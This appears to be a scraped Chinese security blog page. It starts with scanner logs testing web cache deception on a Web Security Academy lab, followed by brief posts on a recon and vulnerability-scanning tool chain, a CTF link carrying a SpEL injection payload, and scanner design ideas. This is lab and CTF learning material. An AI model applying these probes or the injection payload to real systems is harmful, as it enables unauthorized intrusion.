2025/10/23 20:46:05 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%252Daa
2025/10/23 20:46:05 [DEBUG] 正在测试分隔符 (来自字典): ‘%2E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2Eaa
2025/10/23 20:46:05 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%252Eaa
2025/10/23 20:46:05 [DEBUG] 正在测试分隔符 (来自字典): ‘%2F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2Faa
2025/10/23 20:46:05 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%252F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%252Faa
2025/10/23 20:46:06 [DEBUG] 正在测试分隔符 (来自字典): ‘%3A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%3Aaa
2025/10/23 20:46:06 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253A’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%253Aaa
2025/10/23 20:46:06 [DEBUG] 正在测试分隔符 (来自字典): ‘%3B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%3Baa
2025/10/23 20:46:06 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%253Baa
2025/10/23 20:46:06 [DEBUG] 正在测试分隔符 (来自字典): ‘%3C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%3Caa
2025/10/23 20:46:06 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%253Caa
2025/10/23 20:46:07 [DEBUG] 正在测试分隔符 (来自字典): ‘%3D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%3Daa
2025/10/23 20:46:07 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%253Daa
2025/10/23 20:46:07 [DEBUG] 正在测试分隔符 (来自字典): ‘%3E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%3Eaa
2025/10/23 20:46:07 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%253Eaa
2025/10/23 20:46:07 [DEBUG] 正在测试分隔符 (来自字典): ‘%3F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%3Faa
2025/10/23 20:46:07 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%253F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%253Faa
2025/10/23 20:46:08 [DEBUG] 正在测试分隔符 (来自字典): ‘%40’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%40aa
2025/10/23 20:46:08 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2540’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2540aa
2025/10/23 20:46:08 [DEBUG] 正在测试分隔符 (来自字典): ‘%5B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%5Baa
2025/10/23 20:46:08 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%255Baa
2025/10/23 20:46:08 [DEBUG] 正在测试分隔符 (来自字典): ‘%5C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%5Caa
2025/10/23 20:46:09 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%255Caa
2025/10/23 20:46:09 [DEBUG] 正在测试分隔符 (来自字典): ‘%5D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%5Daa
2025/10/23 20:46:09 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%255Daa
2025/10/23 20:46:09 [DEBUG] 正在测试分隔符 (来自字典): ‘%5E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%5Eaa
2025/10/23 20:46:09 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%255Eaa
2025/10/23 20:46:09 [DEBUG] 正在测试分隔符 (来自字典): ‘%5F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%5Faa
2025/10/23 20:46:10 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%255F’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%255Faa
2025/10/23 20:46:10 [DEBUG] 正在测试分隔符 (来自字典): ‘%60’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%60aa
2025/10/23 20:46:10 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%2560’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%2560aa
2025/10/23 20:46:10 [DEBUG] 正在测试分隔符 (来自字典): ‘%7B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%7Baa
2025/10/23 20:46:10 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%257B’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%257Baa
2025/10/23 20:46:11 [DEBUG] 正在测试分隔符 (来自字典): ‘%7C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%7Caa
2025/10/23 20:46:11 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%257C’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%257Caa
2025/10/23 20:46:11 [DEBUG] 正在测试分隔符 (来自字典): ‘%7D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%7Daa
2025/10/23 20:46:11 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%257D’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%257Daa
2025/10/23 20:46:11 [DEBUG] 正在测试分隔符 (来自字典): ‘%7E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%7Eaa
2025/10/23 20:46:11 [DEBUG] 正在测试分隔符 (字典条目编码后): ‘%257E’, URL: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post%257Eaa
[漏洞] 分隔符逻辑: 为URL https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post 找到分隔符 (来自字典): ‘#’
[漏洞] 分隔符逻辑: 为URL https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post 找到分隔符 (来自字典): ‘?’
2025/10/23 20:46:12 [DEBUG] Requesting URL (1/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/resources/css/aaaaa
2025/10/23 20:46:12 [DEBUG] Requesting URL (2/3): https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/resources/css/aaaaa
[漏洞] 静态目录缓存: 检测到静态目录缓存 https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/resources/css (X-Cache: hit)
[信息] 规范化检查: Origin server normalization detected: https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/resources/css/labsBlog.css and https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/a/..%2fresources/css/labsBlog.css have the same content

[*] 正在进行漏洞分析…
[高危] 潜在漏洞: 源服务器进行规范化，但缓存服务器未进行！

[*] 可缓存的URL:
https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/resources/css/labsBlog.css (X-Cache: hit)
https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/resources/labheader/js/labHeader.js (X-Cache: hit)
https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/resources/labheader/css/academyLabHeader.css (X-Cache: hit)
https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/resources/labheader/js/submitSolution.js (X-Cache: hit)
https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/resources/js/tracking.js (X-Cache: hit)
https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/resources/css/labs.css (X-Cache: hit)

[*] 不可缓存的URL:
https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/my-account
https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/login
https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/post
https://0a8b007e038b1af1813bb2fe00e20034.web-security-academy.net/

[*] 扫描完成.

信息收集工具编写

2025-10-19T14:42:23.000Z

网上工具有很多.但是都没有串联,写个缝合怪

模块

域名收集

subfinder

oneforall

合并去重subfinder和oneforall的域名存储到domain.txt

然后使用alterx来对域名进行变体探测

cat domain.txt | alterx | ksubdomain -verify -silent |tee res.txt
合并去重 domain.txt与res.txt
得到最终的domains.txt

端口扫描

top100 默认

使用naabu进行扫描top100

url处理

naabu扫描完端口后使用httpx进行验证，并输出在项目的url文件夹下

主动爬取

将获取的url使用ktana进行主动爬取，然后传给hakrawler，输出在url文件夹下

被动爬取

使用gau
xscan存在主动与被动，主动爬取的url传入xscan，输出其主动和gau被动爬取的值。
所有扫描结束后将值

url去重

主动爬取的url结果经过urldedupe处理 -s 处理

漏洞发现

nuclei(内存占用也大，采用10000，10000行的形式会好很多)

xss

扫描时使用脚本讲url分为10000行10000行的进行扫描以减少内存消耗防止劫持被kill
在扫描好一个文件后删除这个临时文件

子域名接管

这个在讲域名收集好后进行探测

自己写的脚本

8.使用gf提取易ssrf估计的url，轮换每个参数为反连域名的url，给httpx访问同时开启302跳转来测试url跳转漏洞

强网

2025-10-18T11:46:51.000Z

https://eci-2ze5i7cbu6fsrcnhkfnv.cloudeci1.ichunqiu.com:8080/check?rule=%23%7B%23systemProperties%5B'user.home'%5D=%22/tmp/%22%7D

chacklist

2025-10-13T10:30:39.000Z

Hey, password is required here.

实验课扫描器

2025-10-07T09:17:24.000Z

基础功能参考国内扫描器即可

重点功能

1.信息收集
写个爬虫爬取qcc，商cc的子公司，然后icp查所有域名
子域名查询使用网上较为流行的工具，oneforall，subdoamin这些的。

2.增加一个添加自定义扫描器的功能
只要输入这个扫描器的运行指令，将文件那块用{aaa}这种的当成占位符，然后将输出文件的文件名填写即可添加这个扫描器的功能

尽量使用正则之类的来适配绝大部分的扫描结果内容。然后得有个输出结果下载功能下载的是这个扫描器正常输出的扫描结果文件，来防止正则匹配不正常。

SRC

2025-09-29T09:35:36.000Z

协会展示

2025-09-24T09:05:30.000Z